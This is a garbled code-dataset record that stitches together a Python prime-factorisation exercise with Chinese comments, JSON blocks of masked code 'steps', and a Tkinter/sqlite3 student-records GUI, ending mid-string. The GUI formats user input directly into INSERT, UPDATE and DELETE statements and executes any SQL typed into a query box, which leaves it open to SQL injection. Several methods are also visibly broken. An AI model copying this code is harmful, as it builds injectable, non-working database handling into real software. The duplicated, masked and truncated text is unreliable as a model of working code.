for i in range(len(a) - 1):
print(a[i], end='*')
print(a[len(a) - 1])
<|reserved_special_token_1|>
#题目014:将一个正整数分解质因数
#【编程思路】类似手算分解质因数的过程,找出因数后,原数字缩小
'''
找出质因数并不难,把他们打印出来有点小烦
'''
num = int(input('请输入一个整数:'))
original=num
a= []
while num > 1:
for i in range(2,num+1):
if num%i == 0:
a.append(i)
num = num//i
break
print("%d ="%(original),end='')
for i in range(len(a)-1):
print(a[i],end='*')
print(a[len(a)-1])
|
flexible
|
{
"blob_id": "78e72bf3ac73113e2c71caf5aed70b53cafa9c46",
"index": 3413,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile num > 1:\n for i in range(2, num + 1):\n if num % i == 0:\n a.append(i)\n num = num // i\n break\nprint('%d =' % original, end='')\nfor i in range(len(a) - 1):\n print(a[i], end='*')\nprint(a[len(a) - 1])\n",
"step-3": "<mask token>\nnum = int(input('请输入一个整数:'))\noriginal = num\na = []\nwhile num > 1:\n for i in range(2, num + 1):\n if num % i == 0:\n a.append(i)\n num = num // i\n break\nprint('%d =' % original, end='')\nfor i in range(len(a) - 1):\n print(a[i], end='*')\nprint(a[len(a) - 1])\n",
"step-4": "#题目014:将一个正整数分解质因数\r\n#【编程思路】类似手算分解质因数的过程,找出因数后,原数字缩小\r\n'''\r\n找出质因数并不难,把他们打印出来有点小烦\r\n'''\r\n\r\nnum = int(input('请输入一个整数:'))\r\noriginal=num\r\n\r\na= []\r\nwhile num > 1:\r\n for i in range(2,num+1):\r\n if num%i == 0:\r\n a.append(i)\r\n num = num//i\r\n break\r\n\r\nprint(\"%d =\"%(original),end='')\r\nfor i in range(len(a)-1):\r\n print(a[i],end='*')\r\n\r\nprint(a[len(a)-1])\r\n \r\n \r\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from tkinter import*
from tkinter import filedialog
import sqlite3
class Gui:
def __init__(self):
global en3
self.scr = Tk()
self.scr.geometry("2000x3000")
self.scr.title("VIEWING DATABASE")
self.connection = sqlite3.connect("student_details.db")
self.cursor = self.connection.cursor()
self.id = StringVar()
self.name1 = StringVar()
self.fathername = StringVar()
self.mothername = StringVar()
self.cont = StringVar()
self.email = StringVar()
self.f1 = Frame(self.scr, bg='brown1')
self.f1.pack(side=TOP)
self.left_frame = Frame(self.scr, bg='red')
self.left_frame.pack(side=LEFT, fill=Y)
self.right_frame = Frame(self.scr, width=3000, bg='yellow')
self.right_frame.pack(side=LEFT, fill=Y)
l = Label(self.right_frame, text="***************SHOW TABLE RECORDS IN A DATABASE******************",
font=('times', 25, 'bold'), bg="black", fg="white")
l.pack(side=TOP, fill=X)
scrollbar = Scrollbar(self.right_frame)
scrollbar.pack(side=RIGHT, fill=Y)
self.list = Listbox(self.right_frame, width=61, height=12, font=('times', 25, 'bold'),
yscrollcommand=scrollbar.set)
self.list.bind("student_list", self.show_records)
self.list.pack(side=TOP, fill=Y)
scrollbar.config(command=self.list.yview)
self.querry_frame = Frame(self.right_frame, width=81, height=5, bg="white")
self.querry_frame.pack(side=BOTTOM, fill=X)
self.en3 = Entry(self.querry_frame, font=('times', 25, 'bold'))
self.en3.pack(side=BOTTOM, fill=X)
b = Button(self.querry_frame, text="Enter",command=self.sample, font=('times', 25, 'bold'), bg="white", fg="black")
b.pack(side=RIGHT)
b1 = Button(self.querry_frame, text="Save", command=self.show_data, font=('times', 25, 'bold'), bg="white",
fg="black")
b1.pack(side=RIGHT)
b = Button(self.f1, text="OPEN", command=self.file, font=('times', 25, 'bold'), bg="white", fg="black")
b.pack(side=LEFT)
b = Button(self.f1, text="CREATE", command=self.create_table, font=('times', 25, 'bold'), bg="white",
fg="black")
b.pack(side=LEFT)
b1 = Button(self.f1, text="INSERT", command=self.add_record, font=('times', 25, 'bold'), bg="white",
fg="black")
b1.pack(side=LEFT)
b2 = Button(self.f1, text="DELETE", command=self.del_rec, font=('times', 25, 'bold'), bg="white",
fg="black")
b2.pack(side=LEFT)
b3 = Button(self.f1, text="UPDATE", command=self.update, font=('times', 25, 'bold'), bg="white",
fg="black")
b3.pack(side=RIGHT)
b4 = Button(self.f1, text="VIEW", command=lambda: self.view_table(), font=('times', 25, 'bold'), bg="white",
fg="black")
b4.pack(side=RIGHT)
b4 = Button(self.f1, text="BROWSE", command=self.show_data, font=('times', 25, 'bold'), bg="white",
fg="black")
b4.pack(side=RIGHT)
l = Label(self.left_frame, text="View Table in Database", font=('times', 25, 'bold'), bg='blue', fg='white')
l.pack(side=TOP, fill=X)
self.scr.mainloop()
try:
self.cursor.execute("create table user(Id varchar(10),Name varchar(30),FathersName varchar(20),MothersName varchar(20),Contact varchar(10),Email varchar(30))")
self.connection.commit()
except:
pass
def insert_data(self):
self.id = e.get()
self.name1 = e1.get()
self.fathername=e2.get()
self.mothername = e3.get()
self.cont = e4.get()
self.email = e5.get()
self.cursor.execute("insert into user values('{}','{}','{}','{}','{}','{}')".format(self.id,self.name1, self.fathername,self.mothername,self.cont , self.email))
self.connection.commit()
def show_data(self):
self.connection = sqlite3.connect("student_details.db")
self.cursor = self.connection.cursor()
self.cursor.execute("Select * from user")
rows = self.cursor.fetchall()
for row in rows:
l1 = self.list.insert(END, row)
self.connection.commit()
def update_data(self):
self.cursor.execute("Update user set {} = '{}' where id ='{}'".format(e2.get(),e3.get(),e.get()))
self.connection.commit()
self.list.delete(0, END)
self.show_data()
def update(self):
global e
global e2
global e3
self.top1 = Toplevel(self.scr)
self.top1.geometry("400x400")
l1 = Label(self.top1, text="USER_ID", font=('times', 25, 'bold'), bg="green2", fg="white")
l1.pack()
self.Id=StringVar()
e = Entry(self.top1, relief="sunken", textvariable=self.Id, font=('times', 25, 'bold'))
e.pack()
self.col_name=StringVar()
l2 = Label(self.top1, text="col_name", font=('times', 25, 'bold'), bg="green2", fg="white")
l2.pack()
e2 = Entry(self.top1, relief="sunken", textvariable=self.col_name, font=('times', 25, 'bold'))
e2.pack()
self.value=StringVar()
l3 = Label(self.top1, text="VALUE", font=('times', 25, 'bold'), bg="green2", fg="white")
l3.pack()
e3 = Entry(self.top1, relief="sunken", textvariable=self.value, font=('times', 25, 'bold'))
e3.pack()
b = Button(self.top1, text="UPDATE", command=self.update_data, font=('times', 25, 'bold'), bg="white",
fg="black")
b.pack()
self.top1.mainloop()
def delete_data(self):
self.cursor.execute("Delete from user where id ='{}'".format(e.get()))
self.list.delete(0,END)
self.connection.commit()
self.show_data()
def del_rec(self):
global e
self.top2 = Toplevel(self.scr)
self.top2.geometry("400x400")
l1 = Label(self.top2, text="USER_ID", font=('times', 25, 'bold'), bg="green2", fg="white")
l1.pack()
self.Id = StringVar()
e = Entry(self.top2, relief="sunken", textvariable=self.Id, font=('times', 25, 'bold'))
e.pack()
b = Button(self.top2, text="delete records", command=self.delete_data, font=('times', 25, 'bold'), bg="white",
fg="black")
b.pack()
self.top2.mainloop()
def sample(self):
s=('{}'.format(self.en3.get()))
a=self.cursor.execute("{}".format(self.en3.get()))
r=self.cursor.fetchall()
for row in r:
self.list.insert(0,row)
self.connection.commit()
def file(self):
self.f1.filename = filedialog.askopenfilename( title="Select file")
p=self.f1.filename
self.list.insert(0,self.f1.filename)
def add_record(self):
global e
global e1
global e2
global e3
global e4
global e5
self.e = StringVar()
self.e1 = StringVar()
self.e2 = StringVar()
self.e3 = StringVar()
self.e4 = StringVar()
self.e5 = StringVar()
self.top=Toplevel(self.scr)
self.top.geometry("400x800")
l=Label(self.top,text="USER_ID",font=('times',25,'bold'),bg="green2",fg="white")
l.pack()
e=Entry(self.top,relief="sunken",textvariable=self.e,font=('times',25,'bold'))
e.pack()
l1 = Label(self.top, text="USERNAME", font=('times', 25, 'bold'), bg="green2", fg="white")
l1.pack()
e1 = Entry(self.top, relief="sunken",textvariable=self.e1, font=('times', 25, 'bold'))
e1.pack()
l2 = Label(self.top, text="FATHERS NAME", font=('times', 25, 'bold'), bg="green2", fg="white")
l2.pack()
e2 = Entry(self.top, relief="sunken",textvariable=self.e2, font=('times', 25, 'bold'))
e2.pack()
l3 = Label(self.top, text="MOTHERS NAME", font=('times', 25, 'bold'), bg="green2", fg="white")
l3.pack()
e3 = Entry(self.top, relief="sunken",textvariable=self.e3, font=('times', 25, 'bold'))
e3.pack()
l4 = Label(self.top, text="CONTACT NO", font=('times', 25, 'bold'), bg="green2", fg="white")
l4.pack()
e4 = Entry(self.top, relief="sunken",textvariable=self.e4, font=('times', 25, 'bold'))
e4.pack()
l5 = Label(self.top, text="E-MAIL ID", font=('times', 25, 'bold'), bg="green2", fg="white")
l5.pack()
e5 = Entry(self.top, relief="sunken",textvariable=self.e5, font=('times', 25, 'bold'))
e5.pack()
varchk=IntVar()
b = Button(self.top, text="SUBMIT", command=self.insert_data,font=('times', 25, 'bold'), bg="white",fg="black")
b.pack()
self.top.mainloop()
def view_table(self):
global list_box
self.list_box = Listbox(self.left_frame, font=('times', 20, 'bold'))
try:
self.list_box.insert(1,"user")
self.list_box.insert(2,self.tbl_name)
except:
pass
b=Button(self.left_frame,text="Click",font=('times', 20, 'bold'),command=self.selection,bg="white",fg="black")
b.place(x=100,y=400)
self.list_box.place(x=10,y=50)
def selection(self):
lb = self.list_box.curselection()
print(lb)
for i in list(lb):
self.show_data()
def show_records(self):
global m
m=self.list.curselection()
m=self.list.get(m)
self.id.delete(0,END)
self.id.insert(END,self.add_record())
global table_name
def create_table(self):
self.top = Toplevel(self.scr)
self.top.geometry("400x800")
self.table_name=StringVar()
l=Label(self.top,text="Table",font=('times', 20, 'bold'),bg="white",fg="black")
l.pack()
e=Entry(self.top,textvariable=self.table_name,font=('times', 20, 'bold'))
e.pack()
b=Button(self.top,text="Add field",command=self.fun_show , font=('times', 20, 'bold'),bg="white",fg="black")
b.pack()
b=Button(self.top,text="OK",font=('times', 20, 'bold'),command=self.show_entered_data,bg="white",fg="black")
b.pack(side=RIGHT)
def show_entered_data(self):
global en1
global en2
global list1
global tbl_name
self.tbl_name=self.table_name.get()
self.en1=self.entry1.get()
self.en2=self.entry2.get()
sent="Create table "+str(self.tbl_name)+"('"+str(self.en1)+ " "+ str(self.en2)+"')"
list1 = Text(self.top, width=41, height=8, font=('times', 25, 'bold'))
list1.place(x=0,y=0)
list1.insert(0.0,sent)
print(self.tbl_name,self.en1,self.en2)
self.cursor.execute(sent)
self.list.insert(0,sent)
self.connection.commit()
def fun_show(self):
l = Label(self.top, text="Name", font=('times', 20, 'bold'), bg="white", fg="black")
l.pack(side=TOP)
self.entry1 = StringVar()
e1 = Entry(self.top, textvariable=self.entry1, font=('times', 20, 'bold'))
e1.pack()
l = Label(self.top, text="type", font=('times', 20, 'bold'), bg="white", fg="black")
l.pack(side=TOP)
self.entry2 = StringVar()
e1 = Entry(self.top, textvariable=self.entry2, font=('times', 20, 'bold'))
e1.pack()
Gui()
|
normal
|
{
"blob_id": "4c6b04716f41c3413896f0d59f2cc9b1475d7f64",
"index": 5164,
"step-1": "<mask token>\n\n\nclass Gui:\n <mask token>\n\n def insert_data(self):\n self.id = e.get()\n self.name1 = e1.get()\n self.fathername = e2.get()\n self.mothername = e3.get()\n self.cont = e4.get()\n self.email = e5.get()\n self.cursor.execute(\n \"insert into user values('{}','{}','{}','{}','{}','{}')\".format\n (self.id, self.name1, self.fathername, self.mothername, self.\n cont, self.email))\n self.connection.commit()\n <mask token>\n <mask token>\n\n def update(self):\n global e\n global e2\n global e3\n self.top1 = Toplevel(self.scr)\n self.top1.geometry('400x400')\n l1 = Label(self.top1, text='USER_ID', font=('times', 25, 'bold'),\n bg='green2', fg='white')\n l1.pack()\n self.Id = StringVar()\n e = Entry(self.top1, relief='sunken', textvariable=self.Id, font=(\n 'times', 25, 'bold'))\n e.pack()\n self.col_name = StringVar()\n l2 = Label(self.top1, text='col_name', font=('times', 25, 'bold'),\n bg='green2', fg='white')\n l2.pack()\n e2 = Entry(self.top1, relief='sunken', textvariable=self.col_name,\n font=('times', 25, 'bold'))\n e2.pack()\n self.value = StringVar()\n l3 = Label(self.top1, text='VALUE', font=('times', 25, 'bold'), bg=\n 'green2', fg='white')\n l3.pack()\n e3 = Entry(self.top1, relief='sunken', textvariable=self.value,\n font=('times', 25, 'bold'))\n e3.pack()\n b = Button(self.top1, text='UPDATE', command=self.update_data, font\n =('times', 25, 'bold'), bg='white', fg='black')\n b.pack()\n self.top1.mainloop()\n\n def delete_data(self):\n self.cursor.execute(\"Delete from user where id ='{}'\".format(e.get()))\n self.list.delete(0, END)\n self.connection.commit()\n self.show_data()\n\n def del_rec(self):\n global e\n self.top2 = Toplevel(self.scr)\n self.top2.geometry('400x400')\n l1 = Label(self.top2, text='USER_ID', font=('times', 25, 'bold'),\n bg='green2', fg='white')\n l1.pack()\n self.Id = StringVar()\n e = Entry(self.top2, relief='sunken', textvariable=self.Id, font=(\n 'times', 25, 'bold'))\n e.pack()\n b = Button(self.top2, text='delete records', command=self.\n delete_data, font=('times', 25, 'bold'), bg='white', fg='black')\n b.pack()\n self.top2.mainloop()\n\n def sample(self):\n s = '{}'.format(self.en3.get())\n a = self.cursor.execute('{}'.format(self.en3.get()))\n r = self.cursor.fetchall()\n for row in r:\n self.list.insert(0, row)\n self.connection.commit()\n <mask token>\n\n def add_record(self):\n global e\n global e1\n global e2\n global e3\n global e4\n global e5\n self.e = StringVar()\n self.e1 = StringVar()\n self.e2 = StringVar()\n self.e3 = StringVar()\n self.e4 = StringVar()\n self.e5 = StringVar()\n self.top = Toplevel(self.scr)\n self.top.geometry('400x800')\n l = Label(self.top, text='USER_ID', font=('times', 25, 'bold'), bg=\n 'green2', fg='white')\n l.pack()\n e = Entry(self.top, relief='sunken', textvariable=self.e, font=(\n 'times', 25, 'bold'))\n e.pack()\n l1 = Label(self.top, text='USERNAME', font=('times', 25, 'bold'),\n bg='green2', fg='white')\n l1.pack()\n e1 = Entry(self.top, relief='sunken', textvariable=self.e1, font=(\n 'times', 25, 'bold'))\n e1.pack()\n l2 = Label(self.top, text='FATHERS NAME', font=('times', 25, 'bold'\n ), bg='green2', fg='white')\n l2.pack()\n e2 = Entry(self.top, relief='sunken', textvariable=self.e2, font=(\n 'times', 25, 'bold'))\n e2.pack()\n l3 = Label(self.top, text='MOTHERS NAME', font=('times', 25, 'bold'\n ), bg='green2', fg='white')\n l3.pack()\n e3 = Entry(self.top, relief='sunken', textvariable=self.e3, font=(\n 'times', 25, 'bold'))\n e3.pack()\n l4 = Label(self.top, text='CONTACT NO', font=('times', 25, 'bold'),\n bg='green2', fg='white')\n l4.pack()\n e4 = Entry(self.top, relief='sunken', textvariable=self.e4, font=(\n 'times', 25, 'bold'))\n e4.pack()\n l5 = Label(self.top, text='E-MAIL ID', font=('times', 25, 'bold'),\n bg='green2', fg='white')\n l5.pack()\n e5 = Entry(self.top, relief='sunken', textvariable=self.e5, font=(\n 'times', 25, 'bold'))\n e5.pack()\n varchk = IntVar()\n b = Button(self.top, text='SUBMIT', command=self.insert_data, font=\n ('times', 25, 'bold'), bg='white', fg='black')\n b.pack()\n self.top.mainloop()\n <mask token>\n\n def selection(self):\n lb = self.list_box.curselection()\n print(lb)\n for i in list(lb):\n self.show_data()\n <mask token>\n global table_name\n <mask token>\n\n def show_entered_data(self):\n global en1\n global en2\n global list1\n global tbl_name\n self.tbl_name = self.table_name.get()\n self.en1 = self.entry1.get()\n self.en2 = self.entry2.get()\n sent = 'Create table ' + str(self.tbl_name) + \"('\" + str(self.en1\n ) + ' ' + str(self.en2) + \"')\"\n list1 = Text(self.top, width=41, height=8, font=('times', 25, 'bold'))\n list1.place(x=0, y=0)\n list1.insert(0.0, sent)\n print(self.tbl_name, self.en1, self.en2)\n self.cursor.execute(sent)\n self.list.insert(0, sent)\n self.connection.commit()\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Gui:\n <mask token>\n\n def insert_data(self):\n self.id = e.get()\n self.name1 = e1.get()\n self.fathername = e2.get()\n self.mothername = e3.get()\n self.cont = e4.get()\n self.email = e5.get()\n self.cursor.execute(\n \"insert into user values('{}','{}','{}','{}','{}','{}')\".format\n (self.id, self.name1, self.fathername, self.mothername, self.\n cont, self.email))\n self.connection.commit()\n\n def show_data(self):\n self.connection = sqlite3.connect('student_details.db')\n self.cursor = self.connection.cursor()\n self.cursor.execute('Select * from user')\n rows = self.cursor.fetchall()\n for row in rows:\n l1 = self.list.insert(END, row)\n self.connection.commit()\n <mask token>\n\n def update(self):\n global e\n global e2\n global e3\n self.top1 = Toplevel(self.scr)\n self.top1.geometry('400x400')\n l1 = Label(self.top1, text='USER_ID', font=('times', 25, 'bold'),\n bg='green2', fg='white')\n l1.pack()\n self.Id = StringVar()\n e = Entry(self.top1, relief='sunken', textvariable=self.Id, font=(\n 'times', 25, 'bold'))\n e.pack()\n self.col_name = StringVar()\n l2 = Label(self.top1, text='col_name', font=('times', 25, 'bold'),\n bg='green2', fg='white')\n l2.pack()\n e2 = Entry(self.top1, relief='sunken', textvariable=self.col_name,\n font=('times', 25, 'bold'))\n e2.pack()\n self.value = StringVar()\n l3 = Label(self.top1, text='VALUE', font=('times', 25, 'bold'), bg=\n 'green2', fg='white')\n l3.pack()\n e3 = Entry(self.top1, relief='sunken', textvariable=self.value,\n font=('times', 25, 'bold'))\n e3.pack()\n b = Button(self.top1, text='UPDATE', command=self.update_data, font\n =('times', 25, 'bold'), bg='white', fg='black')\n b.pack()\n self.top1.mainloop()\n\n def delete_data(self):\n self.cursor.execute(\"Delete from user where id ='{}'\".format(e.get()))\n self.list.delete(0, END)\n self.connection.commit()\n self.show_data()\n\n def del_rec(self):\n global e\n self.top2 = Toplevel(self.scr)\n self.top2.geometry('400x400')\n l1 = Label(self.top2, text='USER_ID', font=('times', 25, 'bold'),\n bg='green2', fg='white')\n l1.pack()\n self.Id = StringVar()\n e = Entry(self.top2, relief='sunken', textvariable=self.Id, font=(\n 'times', 25, 'bold'))\n e.pack()\n b = Button(self.top2, text='delete records', command=self.\n delete_data, font=('times', 25, 'bold'), bg='white', fg='black')\n b.pack()\n self.top2.mainloop()\n\n def sample(self):\n s = '{}'.format(self.en3.get())\n a = self.cursor.execute('{}'.format(self.en3.get()))\n r = self.cursor.fetchall()\n for row in r:\n self.list.insert(0, row)\n self.connection.commit()\n\n def file(self):\n self.f1.filename = filedialog.askopenfilename(title='Select file')\n p = self.f1.filename\n self.list.insert(0, self.f1.filename)\n\n def add_record(self):\n global e\n global e1\n global e2\n global e3\n global e4\n global e5\n self.e = StringVar()\n self.e1 = StringVar()\n self.e2 = StringVar()\n self.e3 = StringVar()\n self.e4 = StringVar()\n self.e5 = StringVar()\n self.top = Toplevel(self.scr)\n self.top.geometry('400x800')\n l = Label(self.top, text='USER_ID', font=('times', 25, 'bold'), bg=\n 'green2', fg='white')\n l.pack()\n e = Entry(self.top, relief='sunken', textvariable=self.e, font=(\n 'times', 25, 'bold'))\n e.pack()\n l1 = Label(self.top, text='USERNAME', font=('times', 25, 'bold'),\n bg='green2', fg='white')\n l1.pack()\n e1 = Entry(self.top, relief='sunken', textvariable=self.e1, font=(\n 'times', 25, 'bold'))\n e1.pack()\n l2 = Label(self.top, text='FATHERS NAME', font=('times', 25, 'bold'\n ), bg='green2', fg='white')\n l2.pack()\n e2 = Entry(self.top, relief='sunken', textvariable=self.e2, font=(\n 'times', 25, 'bold'))\n e2.pack()\n l3 = Label(self.top, text='MOTHERS NAME', font=('times', 25, 'bold'\n ), bg='green2', fg='white')\n l3.pack()\n e3 = Entry(self.top, relief='sunken', textvariable=self.e3, font=(\n 'times', 25, 'bold'))\n e3.pack()\n l4 = Label(self.top, text='CONTACT NO', font=('times', 25, 'bold'),\n bg='green2', fg='white')\n l4.pack()\n e4 = Entry(self.top, relief='sunken', textvariable=self.e4, font=(\n 'times', 25, 'bold'))\n e4.pack()\n l5 = Label(self.top, text='E-MAIL ID', font=('times', 25, 'bold'),\n bg='green2', fg='white')\n l5.pack()\n e5 = Entry(self.top, relief='sunken', textvariable=self.e5, font=(\n 'times', 25, 'bold'))\n e5.pack()\n varchk = IntVar()\n b = Button(self.top, text='SUBMIT', command=self.insert_data, font=\n ('times', 25, 'bold'), bg='white', fg='black')\n b.pack()\n self.top.mainloop()\n <mask token>\n\n def selection(self):\n lb = self.list_box.curselection()\n print(lb)\n for i in list(lb):\n self.show_data()\n <mask token>\n global table_name\n\n def create_table(self):\n self.top = Toplevel(self.scr)\n self.top.geometry('400x800')\n self.table_name = StringVar()\n l = Label(self.top, text='Table', font=('times', 20, 'bold'), bg=\n 'white', fg='black')\n l.pack()\n e = Entry(self.top, textvariable=self.table_name, font=('times', 20,\n 'bold'))\n e.pack()\n b = Button(self.top, text='Add field', command=self.fun_show, font=\n ('times', 20, 'bold'), bg='white', fg='black')\n b.pack()\n b = Button(self.top, text='OK', font=('times', 20, 'bold'), command\n =self.show_entered_data, bg='white', fg='black')\n b.pack(side=RIGHT)\n\n def show_entered_data(self):\n global en1\n global en2\n global list1\n global tbl_name\n self.tbl_name = self.table_name.get()\n self.en1 = self.entry1.get()\n self.en2 = self.entry2.get()\n sent = 'Create table ' + str(self.tbl_name) + \"('\" + str(self.en1\n ) + ' ' + str(self.en2) + \"')\"\n list1 = Text(self.top, width=41, height=8, font=('times', 25, 'bold'))\n list1.place(x=0, y=0)\n list1.insert(0.0, sent)\n print(self.tbl_name, self.en1, self.en2)\n self.cursor.execute(sent)\n self.list.insert(0, sent)\n self.connection.commit()\n <mask token>\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Gui:\n\n def __init__(self):\n global en3\n self.scr = Tk()\n self.scr.geometry('2000x3000')\n self.scr.title('VIEWING DATABASE')\n self.connection = sqlite3.connect('student_details.db')\n self.cursor = self.connection.cursor()\n self.id = StringVar()\n self.name1 = StringVar()\n self.fathername = StringVar()\n self.mothername = StringVar()\n self.cont = StringVar()\n self.email = StringVar()\n self.f1 = Frame(self.scr, bg='brown1')\n self.f1.pack(side=TOP)\n self.left_frame = Frame(self.scr, bg='red')\n self.left_frame.pack(side=LEFT, fill=Y)\n self.right_frame = Frame(self.scr, width=3000, bg='yellow')\n self.right_frame.pack(side=LEFT, fill=Y)\n l = Label(self.right_frame, text=\n '***************SHOW TABLE RECORDS IN A DATABASE******************'\n , font=('times', 25, 'bold'), bg='black', fg='white')\n l.pack(side=TOP, fill=X)\n scrollbar = Scrollbar(self.right_frame)\n scrollbar.pack(side=RIGHT, fill=Y)\n self.list = Listbox(self.right_frame, width=61, height=12, font=(\n 'times', 25, 'bold'), yscrollcommand=scrollbar.set)\n self.list.bind('student_list', self.show_records)\n self.list.pack(side=TOP, fill=Y)\n scrollbar.config(command=self.list.yview)\n self.querry_frame = Frame(self.right_frame, width=81, height=5, bg=\n 'white')\n self.querry_frame.pack(side=BOTTOM, fill=X)\n self.en3 = Entry(self.querry_frame, font=('times', 25, 'bold'))\n self.en3.pack(side=BOTTOM, fill=X)\n b = Button(self.querry_frame, text='Enter', command=self.sample,\n font=('times', 25, 'bold'), bg='white', fg='black')\n b.pack(side=RIGHT)\n b1 = Button(self.querry_frame, text='Save', command=self.show_data,\n font=('times', 25, 'bold'), bg='white', fg='black')\n b1.pack(side=RIGHT)\n b = Button(self.f1, text='OPEN', command=self.file, font=('times', \n 25, 'bold'), bg='white', fg='black')\n b.pack(side=LEFT)\n b = Button(self.f1, text='CREATE', command=self.create_table, font=\n ('times', 25, 'bold'), bg='white', fg='black')\n b.pack(side=LEFT)\n b1 = Button(self.f1, text='INSERT', command=self.add_record, font=(\n 'times', 25, 'bold'), bg='white', fg='black')\n b1.pack(side=LEFT)\n b2 = Button(self.f1, text='DELETE', command=self.del_rec, font=(\n 'times', 25, 'bold'), bg='white', fg='black')\n b2.pack(side=LEFT)\n b3 = Button(self.f1, text='UPDATE', command=self.update, font=(\n 'times', 25, 'bold'), bg='white', fg='black')\n b3.pack(side=RIGHT)\n b4 = Button(self.f1, text='VIEW', command=lambda : self.view_table(\n ), font=('times', 25, 'bold'), bg='white', fg='black')\n b4.pack(side=RIGHT)\n b4 = Button(self.f1, text='BROWSE', command=self.show_data, font=(\n 'times', 25, 'bold'), bg='white', fg='black')\n b4.pack(side=RIGHT)\n l = Label(self.left_frame, text='View Table in Database', font=(\n 'times', 25, 'bold'), bg='blue', fg='white')\n l.pack(side=TOP, fill=X)\n self.scr.mainloop()\n try:\n self.cursor.execute(\n 'create table user(Id varchar(10),Name varchar(30),FathersName varchar(20),MothersName varchar(20),Contact varchar(10),Email varchar(30))'\n )\n self.connection.commit()\n except:\n pass\n\n def insert_data(self):\n self.id = e.get()\n self.name1 = e1.get()\n self.fathername = e2.get()\n self.mothername = e3.get()\n self.cont = e4.get()\n self.email = e5.get()\n self.cursor.execute(\n \"insert into user values('{}','{}','{}','{}','{}','{}')\".format\n (self.id, self.name1, self.fathername, self.mothername, self.\n cont, self.email))\n self.connection.commit()\n\n def show_data(self):\n self.connection = sqlite3.connect('student_details.db')\n self.cursor = self.connection.cursor()\n self.cursor.execute('Select * from user')\n rows = self.cursor.fetchall()\n for row in rows:\n l1 = self.list.insert(END, row)\n self.connection.commit()\n\n def update_data(self):\n self.cursor.execute(\"Update user set {} = '{}' where id ='{}'\".\n format(e2.get(), e3.get(), e.get()))\n self.connection.commit()\n self.list.delete(0, END)\n self.show_data()\n\n def update(self):\n global e\n global e2\n global e3\n self.top1 = Toplevel(self.scr)\n self.top1.geometry('400x400')\n l1 = Label(self.top1, text='USER_ID', font=('times', 25, 'bold'),\n bg='green2', fg='white')\n l1.pack()\n self.Id = StringVar()\n e = Entry(self.top1, relief='sunken', textvariable=self.Id, font=(\n 'times', 25, 'bold'))\n e.pack()\n self.col_name = StringVar()\n l2 = Label(self.top1, text='col_name', font=('times', 25, 'bold'),\n bg='green2', fg='white')\n l2.pack()\n e2 = Entry(self.top1, relief='sunken', textvariable=self.col_name,\n font=('times', 25, 'bold'))\n e2.pack()\n self.value = StringVar()\n l3 = Label(self.top1, text='VALUE', font=('times', 25, 'bold'), bg=\n 'green2', fg='white')\n l3.pack()\n e3 = Entry(self.top1, relief='sunken', textvariable=self.value,\n font=('times', 25, 'bold'))\n e3.pack()\n b = Button(self.top1, text='UPDATE', command=self.update_data, font\n =('times', 25, 'bold'), bg='white', fg='black')\n b.pack()\n self.top1.mainloop()\n\n def delete_data(self):\n self.cursor.execute(\"Delete from user where id ='{}'\".format(e.get()))\n self.list.delete(0, END)\n self.connection.commit()\n self.show_data()\n\n def del_rec(self):\n global e\n self.top2 = Toplevel(self.scr)\n self.top2.geometry('400x400')\n l1 = Label(self.top2, text='USER_ID', font=('times', 25, 'bold'),\n bg='green2', fg='white')\n l1.pack()\n self.Id = StringVar()\n e = Entry(self.top2, relief='sunken', textvariable=self.Id, font=(\n 'times', 25, 'bold'))\n e.pack()\n b = Button(self.top2, text='delete records', command=self.\n delete_data, font=('times', 25, 'bold'), bg='white', fg='black')\n b.pack()\n self.top2.mainloop()\n\n def sample(self):\n s = '{}'.format(self.en3.get())\n a = self.cursor.execute('{}'.format(self.en3.get()))\n r = self.cursor.fetchall()\n for row in r:\n self.list.insert(0, row)\n self.connection.commit()\n\n def file(self):\n self.f1.filename = filedialog.askopenfilename(title='Select file')\n p = self.f1.filename\n self.list.insert(0, self.f1.filename)\n\n def add_record(self):\n global e\n global e1\n global e2\n global e3\n global e4\n global e5\n self.e = StringVar()\n self.e1 = StringVar()\n self.e2 = StringVar()\n self.e3 = StringVar()\n self.e4 = StringVar()\n self.e5 = StringVar()\n self.top = Toplevel(self.scr)\n self.top.geometry('400x800')\n l = Label(self.top, text='USER_ID', font=('times', 25, 'bold'), bg=\n 'green2', fg='white')\n l.pack()\n e = Entry(self.top, relief='sunken', textvariable=self.e, font=(\n 'times', 25, 'bold'))\n e.pack()\n l1 = Label(self.top, text='USERNAME', font=('times', 25, 'bold'),\n bg='green2', fg='white')\n l1.pack()\n e1 = Entry(self.top, relief='sunken', textvariable=self.e1, font=(\n 'times', 25, 'bold'))\n e1.pack()\n l2 = Label(self.top, text='FATHERS NAME', font=('times', 25, 'bold'\n ), bg='green2', fg='white')\n l2.pack()\n e2 = Entry(self.top, relief='sunken', textvariable=self.e2, font=(\n 'times', 25, 'bold'))\n e2.pack()\n l3 = Label(self.top, text='MOTHERS NAME', font=('times', 25, 'bold'\n ), bg='green2', fg='white')\n l3.pack()\n e3 = Entry(self.top, relief='sunken', textvariable=self.e3, font=(\n 'times', 25, 'bold'))\n e3.pack()\n l4 = Label(self.top, text='CONTACT NO', font=('times', 25, 'bold'),\n bg='green2', fg='white')\n l4.pack()\n e4 = Entry(self.top, relief='sunken', textvariable=self.e4, font=(\n 'times', 25, 'bold'))\n e4.pack()\n l5 = Label(self.top, text='E-MAIL ID', font=('times', 25, 'bold'),\n bg='green2', fg='white')\n l5.pack()\n e5 = Entry(self.top, relief='sunken', textvariable=self.e5, font=(\n 'times', 25, 'bold'))\n e5.pack()\n varchk = IntVar()\n b = Button(self.top, text='SUBMIT', command=self.insert_data, font=\n ('times', 25, 'bold'), bg='white', fg='black')\n b.pack()\n self.top.mainloop()\n\n def view_table(self):\n global list_box\n self.list_box = Listbox(self.left_frame, font=('times', 20, 'bold'))\n try:\n self.list_box.insert(1, 'user')\n self.list_box.insert(2, self.tbl_name)\n except:\n pass\n b = Button(self.left_frame, text='Click', font=('times', 20, 'bold'\n ), command=self.selection, bg='white', fg='black')\n b.place(x=100, y=400)\n self.list_box.place(x=10, y=50)\n\n def selection(self):\n lb = self.list_box.curselection()\n print(lb)\n for i in list(lb):\n self.show_data()\n\n def show_records(self):\n global m\n m = self.list.curselection()\n m = self.list.get(m)\n self.id.delete(0, END)\n self.id.insert(END, self.add_record())\n global table_name\n\n def 